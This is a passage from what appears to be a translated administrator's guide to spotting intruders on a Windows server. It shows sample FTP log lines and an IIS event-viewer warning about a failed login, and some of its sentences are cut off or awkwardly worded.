13:59:25 127.0.0.1 [2]USER badboy 331
13:59:25 127.0.0.1 [2]PASS - 230
13:59:25 127.0.0.1 [2]sent / 226
13:59:25 127.0.0.1 [2]QUIT - 226 Here, intruder enthusiasts, please note that whatever file you downloaded from a certain site using the target host to FTP is recorded
, don't think that you can escape the evidence of your invasion by deleting files or changing file names.
We do not rule out the possibility that intruders can use proxy servers.
Of course you know that you are being exploited by someone to hack your host, but in these logs you
If the record cannot be found, you should pay more attention, because you are not an ordinary rookie.
Check the error record in the event viewer
We can also find the footprints of intruders in the event viewer of the management tool, such as appearing at a certain period of time
More warning messages. The information is similar to the following:
Event Type: Warning
Source of the event: W3SVC
Event Type: None
Event ID: 100
Date: 2001-2-2
Event: 21:51:26
User: N/A
Computer: CLUB-BUM1HOYJHJ
describe:
The server failed to log in due to error: Unknown username or wrong password. It is not possible to log in to the Windows NT account 'CLUB-BUM1HOYJHJ\badboy'. This data is an error code.
To obtain more information about this message, visit the Microsoft Online Support site:/.
data:
0000: 2e 05 00 00 ....